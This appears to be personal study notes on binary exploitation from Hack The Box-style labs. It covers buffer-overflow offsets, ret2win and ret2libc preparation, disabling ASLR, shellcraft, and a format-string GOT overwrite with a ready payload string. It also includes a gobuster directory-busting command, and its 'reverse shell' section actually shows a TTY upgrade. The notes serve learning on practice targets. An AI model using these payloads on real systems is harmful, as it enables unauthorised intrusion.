Binary Exploitation - By HTB

00 §

• Check file vulnerabilities:

checksec --file <filename>

• Gets rid of Stack, NX and PIE protection (-m32 changes to 32bits):

gcc <filename>.c -o <filename> -fno-stack-protector -z execstack -no-pie -m32

01 §

GDB-Pwndbg:

• It breaks exactly where the breakpoint is.

To view a variable/condition you can use the code below. This would print the location of the result, so it is a pointer to a register that holds it.

x $ebp - 0xc

You can then change that register like this:

set *0xffffceac = 1

02 §

If file type is LSB then reverse order, for example dead would be daed. To get it:

python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"'

Send to a file and run with it: (xD)

python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"' > payload
./runMeImaFile < payload

03 §

Radare2:

aa
afl

We can use cyclic 100 in gdb-pwndbg to generate a pattern, then run that into the program. We then get the characters in the register (eg eip) and run cyclic -l <string>, so for example:

cyclic -l haaa

It will return how many bytes we need to overflow.

If the function we want to access is in 0x08049182 for example, we can do:

python2 -c 'print "A" * 28 + "\x82\x91\x04\x08"' > payload

ropper --file ret2win_params --search "pop rsi"

04 §

We check the cycle, then figure out how much to overflow. We find the return address (what function returns), set a breakpoint to it then run the program with the payload generated.

deadbeef = \xef\xbe\xad\xde

When a function is called, the return pointer is pushed to the stack, so it knows where to return to, followed by any function parameters.

With 64bits, we have to populate the registers not just send the parameters, for example rdi and rsi. We also when running cyclic take the values from the RSP, for example the first four.

05 §

Getting a shell:

shellcraft -l
shellcraft i386.linux.sh
 
# to get it in assembly:
shellcraft i386.linux.sh -f a

To get a reverse shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
# control + z
stty raw -echo; fg;
export TERM=xterm

06 §

This file is safer as you can see with checksec. Therefore, we need to execute bin/sh from LibC.

To find libC we can run ldd <filename>.

To turn off randomiser:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

To get libC address:

ldd <filename>

To find the offset from base libC to system:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

To find offset to /bin/sh for example:

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/bash"

08 §

• https://guyinatuxedo.github.io/5.1-mitigation_aslr_pie/index.html

• https://github.com/shellphish/how2heap

• https://ir0nstone.gitbook.io/notes/types/stack

• Can use piebase in gdb-pwndbg to figure out the offset. For example, breakrva <a function for example 0x11f0 sets a breakpoint in that function no matter if the program restarts as it knows the offset from the top of the run.

To find libc in a remote server: https://libc.blukat.me/ by using the leaked address, for example puts.

We can find the GOT.printf address in Ghidra, inside .got.plt. We can then write something at it.

Tutorial §

• Need to overwrite 0x0804c00c (GOT.printf) with 0xf7dff040 (LIBC.system).

• It means writing 0xf7df (63455) @ 0x0804c00c + 2 = 0x0804c00e (high order) and 0xf040 (61504) @ 0x0804c00c (low order).

• Now, we have to figure out the value to set for the padding. Here is the formula :

[The value we want] - [The bytes alredy wrote] = [The value to set].            

• Let’s start with the low order bytes :

It’ll will be 61504 - 8 = 61496, because we already wrote 8 bytes (the two 4 bytes addresses).

• Then, the high order bytes:

It’ll will be 63455 - 61504 = 1951, because we already wrote 61504 bytes (the two 4 bytes addresses and 61496 bytes from the previous writing).

• Now we can construct the exploit (note our write offset is %4 so we want [%4,%5] as offsets instead of [%7,%8]):

      \x0c\xc0\x04\x08 or 0x0804c00c (in reverse order) points to the low order bytes.    
      \x0e\xc0\x04\x08 or 0x0804c00e (in reverse order) points to the high order bytes.
      %61496x will write 61496 bytes on the standard output.                                              
      %4$hn will write 8 + 61496 = 61504 bytes (or 0xf040) at the first address specified (0x0804c00c).
      %1951x will write 1951 bytes on the standard output.                                                  
      %5$hn will write 8 + 61496 + 1951 = 63455 (or 0xf7df) at the second address specified (0x0804c00e).

  python2 -c 'print("\x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn")' > payload

• Based on excellent blogpost: https://axcheron.github.io/exploit-101-format-strings/

(cat payload; cat) | ./got_overwrite

HTB - Explosion (Starting Point) §

• Info on ports here.

HTB - Preignition (Starting Point) §

• Dir busting:

sudo gobuster dir -w /usr/share/wordlists/dirb/common.txt -u {ip}

HTB - Bike (Starting Point) §

Hacktricks guide (here)

Useful tools §

• Ghidra
• GDB
• Radare2
• Ropper
• GDB-PwnDBG
• LTrace